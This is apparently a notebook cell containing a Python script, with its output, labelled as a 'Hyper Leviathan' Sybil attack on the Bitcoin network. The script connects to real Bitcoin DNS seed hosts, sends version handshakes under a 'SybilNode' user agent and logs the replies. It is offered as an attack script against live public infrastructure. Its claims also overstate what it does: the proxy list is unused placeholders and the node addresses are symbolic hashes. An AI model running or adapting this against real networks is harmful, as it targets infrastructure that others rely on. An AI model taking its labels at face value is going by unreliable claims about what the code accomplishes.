In [15]:
import socket
import struct
import hashlib
import time
import random
import concurrent.futures

# List of proxies to use
PROXIES = [
    'http://proxy1:port',
    'http://proxy2:port',
    'http://proxy3:port',
    # Add more proxies as needed
]

# Bitcoin seed nodes
SEED_NODES = [
    'seed.bitcoin.sipa.be',
    'dnsseed.bluematt.me',
    'dnsseed.bitcoin.dashjr.org',
    'seed.bitcoinstats.com',
    'seed.bitcoin.jonasschnelli.ch',
    'seed.btc.petertodd.org',
]


def double_sha256(data):
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()


def create_message(command, payload):
    """Creates a Bitcoin protocol message"""
    magic = 0xD9B4BEF9  # Mainnet magic value (f9beb4d9 little-endian)
    command_bytes = command.encode('ascii').ljust(12, b'\x00')
    payload_len = len(payload)
    checksum = double_sha256(payload)[:4]

    return struct.pack('<I12sI4s', magic, command_bytes, payload_len, checksum) + payload


def read_varint(data, offset):
    """Lee un varint y devuelve (valor, tamaño_en_bytes)"""
    first_byte = data[offset]
    if first_byte < 0xfd:
        return first_byte, 1  # valor, tamaño = 1 byte
    elif first_byte == 0xfd:
        return struct.unpack('<H', data[offset+1:offset+3])[0], 3  # tamaño = 3 bytes
    elif first_byte == 0xfe:
        return struct.unpack('<I', data[offset+1:offset+5])[0], 5  # tamaño = 5 bytes
    else:  # 0xff
        return struct.unpack('<Q', data[offset+1:offset+9])[0], 9  # tamaño = 9 bytes


def create_version_payload():
    version = 70015  # Protocol version
    services = 1    # NODE_NETWORK (full node)
    timestamp = int(time.time())

    # addr_recv: services, IPv6 address, port
    addr_recv_services = 1
    addr_recv_ip = b'\x00' * 10 + b'\xff\xff' + socket.inet_aton('127.0.0.1')
    addr_recv_port = 8333
    addr_recv = struct.pack('<Q16sH', addr_recv_services, addr_recv_ip, addr_recv_port)

    # addr_from: services, IPv6 address, port
    addr_from_services = 1
    addr_from_ip = b'\x00' * 10 + b'\xff\xff' + socket.inet_aton('127.0.0.1')
    addr_from_port = 8333
    addr_from = struct.pack('<Q16sH', addr_from_services, addr_from_ip, addr_from_port)

    nonce = random.getrandbits(64)
    user_agent_bytes = b'/SybilNode:0.1.0/'
    user_agent_len = len(user_agent_bytes)

    # Variable integer for user_agent_len
    if user_agent_len < 0xfd:
        var_int_user_agent_len = struct.pack('<B', user_agent_len)
    elif user_agent_len <= 0xffff:
        var_int_user_agent_len = struct.pack('<BH', 0xfd, user_agent_len)
    elif user_agent_len <= 0xffffffff:
        var_int_user_agent_len = struct.pack('<BI', 0xfe, user_agent_len)
    else:
        var_int_user_agent_len = struct.pack('<BQ', 0xff, user_agent_len)

    start_height = 0  # Start height
    relay = True      # Relay transactions

    # Combine all parts of the payload
    payload = struct.pack('<iQq', version, services, timestamp) + \
              addr_recv + \
              addr_from + \
              struct.pack('<Q', nonce) + \
              var_int_user_agent_len + \
              user_agent_bytes + \
              struct.pack('<i?', start_height, relay)
    return payload


def parse_version(payload):
    offset = 0
    parsed_data = {}
    try:
        # Version (4 bytes)
        if len(payload) < offset + 4:
            raise ValueError(f"Payload too short for 'version' field. Expected 4, got {len(payload[offset:])}")
        parsed_data['version'] = struct.unpack('<i', payload[offset:offset+4])[0]
        offset += 4

        # Services (8 bytes)
        if len(payload) < offset + 8:
            raise ValueError(f"Payload too short for 'services' field. Expected 8, got {len(payload[offset:])}")
        parsed_data['services'] = struct.unpack('<Q', payload[offset:offset+8])[0]
        offset += 8

        # Timestamp (8 bytes)
        if len(payload) < offset + 8:
            raise ValueError(f"Payload too short for 'timestamp' field. Expected 8, got {len(payload[offset:])}")
        parsed_data['timestamp'] = struct.unpack('<q', payload[offset:offset+8])[0]
        offset += 8

        # Skip addr_recv (26 bytes)
        if len(payload) < offset + 26:
            raise ValueError(f"Payload too short for 'addr_recv' field. Expected 26, got {len(payload[offset:])}")
        offset += 26

        # Skip addr_from (26 bytes)
        if len(payload) < offset + 26:
            raise ValueError(f"Payload too short for 'addr_from' field. Expected 26, got {len(payload[offset:])}")
        offset += 26

        # Nonce (8 bytes)
        if len(payload) < offset + 8:
            raise ValueError(f"Payload too short for 'nonce' field. Expected 8, got {len(payload[offset:])}")
        parsed_data['nonce'] = struct.unpack('<Q', payload[offset:offset+8])[0]
        offset += 8

        # User Agent (variable length)
        if len(payload) < offset + 1:
            raise ValueError(f"Payload too short for 'user_agent_len' varint. Expected at least 1, got {len(payload[offset:])}")
        user_agent_len, varint_size = read_varint(payload, offset)
        offset += varint_size  # Ahora suma correctamente el tamaño del varint

        if len(payload) < offset + user_agent_len:
            raise ValueError(f"Payload too short for 'user_agent' string. Expected {user_agent_len}, got {len(payload[offset:])}")
        parsed_data['user_agent'] = payload[offset:offset+user_agent_len].decode('utf-8', errors='ignore')
        offset += user_agent_len

        # Start Height (4 bytes)
        if len(payload) < offset + 4:
            raise ValueError(f"Payload too short for 'start_height' field. Expected 4, got {len(payload[offset:])}")
        parsed_data['start_height'] = struct.unpack('<i', payload[offset:offset+4])[0]
        offset += 4

        # Relay (1 byte) - opcional en algunas versiones del protocolo
        if len(payload) >= offset + 1:
            parsed_data['relay'] = struct.unpack('?', payload[offset:offset+1])[0]
            offset += 1
        else:
            parsed_data['relay'] = True  # Default value

    except (struct.error, ValueError) as e:
        print(f"DEBUG: Error parsing version payload (total length: {len(payload)}, current offset: {offset}). Error: {e}")
        return None

    return parsed_data


def read_full_message(sock):
    """Read a full Bitcoin message from the socket"""
    # Read header (24 bytes)
    header = b''
    while len(header) < 24:
        chunk = sock.recv(24 - len(header))
        if not chunk:
            raise EOFError("Socket closed prematurely while reading header")
        header += chunk

    magic, command_bytes, length, checksum_expected = struct.unpack('<I12sI4s', header)
    command = command_bytes.decode('ascii').rstrip('\x00')

    # Read payload
    payload = b''
    while len(payload) < length:
        chunk = sock.recv(min(4096, length - len(payload)))
        if not chunk:
            raise EOFError("Socket closed prematurely while reading payload")
        payload += chunk

    # Verify checksum
    checksum_calculated = double_sha256(payload)[:4]
    if checksum_calculated != checksum_expected:
        print(f"Warning: Checksum mismatch for command '{command}' from {sock.getpeername()[0]}:{sock.getpeername()[1]}")

    return command, payload, magic, checksum_expected


def create_sybil_node(proxy):
    """Function to create a Sybil node"""
    seed_node = random.choice(SEED_NODES)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(10)  # Set a timeout for socket operations
    try:
        sock.connect((seed_node, 8333))
        # Bitcoin protocol version message
        version_payload = create_version_payload()
        version_msg = create_message('version', version_payload)
        sock.sendall(version_msg)

        # Receive the version acknowledgment
        command, payload, magic, checksum = read_full_message(sock)
        print(f"Received command '{command}' from {seed_node} (len: {len(payload)} bytes).")

        if command == 'version':
            version_info = parse_version(payload)
            if version_info:
                print(f"  Parsed Version Info: {version_info}")
            else:
                print(f"  Failed to parse version info from {seed_node} due to malformed payload.")
        elif command == 'verack':
            print(f"  Received verack from {seed_node}")
        else:
            print(f"  Received unexpected command: {command}")

    except socket.timeout:
        print(f"Timeout connecting to or receiving from {seed_node}")
        return None
    except EOFError as e:
        print(f"Connection closed prematurely with {seed_node}: {e}")
        return None
    except Exception as e:
        print(f"Error connecting to or communicating with {seed_node}: {e}")
        return None
    finally:
        sock.close()

    # Generate a new address for the Sybil node (symbolic)
    new_address = hashlib.sha256(str(time.time()).encode()).hexdigest()
    return {'address': new_address, 'proxy': proxy}


def connect_sybil_nodes(sybil_nodes):
    """Function to connect Sybil nodes to the network"""
    for node in sybil_nodes:
        seed_node = random.choice(SEED_NODES)
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        try:
            sock.connect((seed_node, 8333))
            version_payload = create_version_payload()
            version_msg = create_message('version', version_payload)
            sock.sendall(version_msg)

            command, payload, magic, checksum = read_full_message(sock)
            print(f"Node {node['address'][:16]}... received command '{command}' from {seed_node}. Payload len: {len(payload)}")

            if command == 'version':
                version_info = parse_version(payload)
                if version_info:
                    print(f"  Parsed Version Info: {version_info}")
                else:
                    print(f"  Failed to parse version info from {seed_node} due to malformed payload.")
            elif command == 'verack':
                print(f"  Received verack from {seed_node}")
            else:
                print(f"  Received unexpected command: {command}")

        except socket.timeout:
            print(f"Timeout connecting node {node['address'][:16]}... to {seed_node}")
            continue
        except EOFError as e:
            print(f"Connection closed prematurely for node {node['address'][:16]}... with {seed_node}: {e}")
            continue
        except Exception as e:
            print(f"Error connecting node {node['address'][:16]}... to {seed_node}: {e}")
            continue
        finally:
            sock.close()


def hyper_leviathan_attack():
    """Main function to execute the Hyper Leviathan attack"""
    sybil_nodes = []

    with concurrent.futures.ThreadPoolExecutor(max_workers=3) as executor:
        future_to_proxy = {executor.submit(create_sybil_node, proxy): proxy for proxy in PROXIES}

        for future in concurrent.futures.as_completed(future_to_proxy):
            proxy = future_to_proxy[future]
            try:
                data = future.result()
                if data:
                    sybil_nodes.append(data)
                    print(f"Created Sybil node with proxy {proxy}: {data['address'][:32]}...")
            except Exception as exc:
                print(f"Generated an exception during Sybil node creation for proxy {proxy}: {exc}")

    if sybil_nodes:
        print(f"\nAttempting to connect {len(sybil_nodes)} Sybil nodes to the network.\n")
        connect_sybil_nodes(sybil_nodes)
    else:
        print("No Sybil nodes were created successfully.")


# Execute the attack
if __name__ == "__main__":
    hyper_leviathan_attack()

Received command 'version' from dnsseed.bluematt.me (len: 102 bytes).
  Parsed Version Info: {'version': 70016, 'services': 3145, 'timestamp': 1767148960, 'nonce': 8229193714033916980, 'user_agent': '/Satoshi:30.0.0/', 'start_height': 930220, 'relay': True}
Created Sybil node with proxy http://proxy1:port: 7dbf3964f572fc35ca2bb9c780bc1127...
Received command 'version' from seed.bitcoin.sipa.be (len: 102 bytes).
  Parsed Version Info: {'version': 70016, 'services': 3081, 'timestamp': 1767148960, 'nonce': 5873222671474626303, 'user_agent': '/Satoshi:28.1.0/', 'start_height': 930220, 'relay': True}
Created Sybil node with proxy http://proxy3:port: 18600252fc55395e5d7f0f074681698e...
Received command 'version' from seed.btc.petertodd.org (len: 102 bytes).
  Parsed Version Info: {'version': 70015, 'services': 1033, 'timestamp': 1767148957, 'nonce': 15318339423070505126, 'user_agent': '/Satoshi:0.20.0/', 'start_height': 930220, 'relay': True}
Created Sybil node with proxy http://proxy2:port: